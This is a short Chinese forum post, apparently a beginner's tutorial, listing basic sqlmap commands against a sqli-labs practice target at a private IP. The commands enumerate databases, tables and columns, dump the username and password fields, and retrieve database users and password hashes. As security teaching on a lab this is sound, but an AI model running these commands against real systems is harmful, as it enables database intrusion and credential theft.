-
-
[推荐]sqlmap基础使用方法
-
发表于:
2020-1-19 15:33
2155
-
小白路过,大佬勿喷!!!
--batch可以不用交互默认进行
检测注入点
sqlmap.py -u http://10.240.4.213/sql/Less-3/?id=1
查看所有数据库
sqlmap.py -u http://10.240.4.213/sql/Less-3/?id=1 --dbs
查看当前数据库
sqlmap.py -u http://10.240.4.213/sql/Less-3/?id=1 --current-db --batch
列出数据库中的表
sqlmap.py -u http://10.240.4.213/sql/Less-3/?id=1 -D security --tables --batch
-D 指定数据库名
--tables 列出表
列出表中字段
sqlmap.py -u http://10.240.4.213/sql/Less-3/?id=1 -D security -T users --columns --batch
sqlmap.py -u http://10.240.4.213/sql/Less-3/?id=1 -D security -T users -C "username,password" --dump --batch
-C 指定的字段
--dump 将结果导出
当前数据库使用账户
sqlmap.py -u http://10.240.4.213/sql/Less-3/?id=1 --current-user --batch
列出数据库所有用户
sqlmap.py -u http://10.240.4.213/sql/Less-3/?id=1 --users --batch
获取数据库账户密码
sqlmap.py -u http://10.240.4.213/sql/Less-3/?id=1 --passwords --batch
[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课
最后于 2020-1-19 15:38
被xiaobaijia编辑
,原因: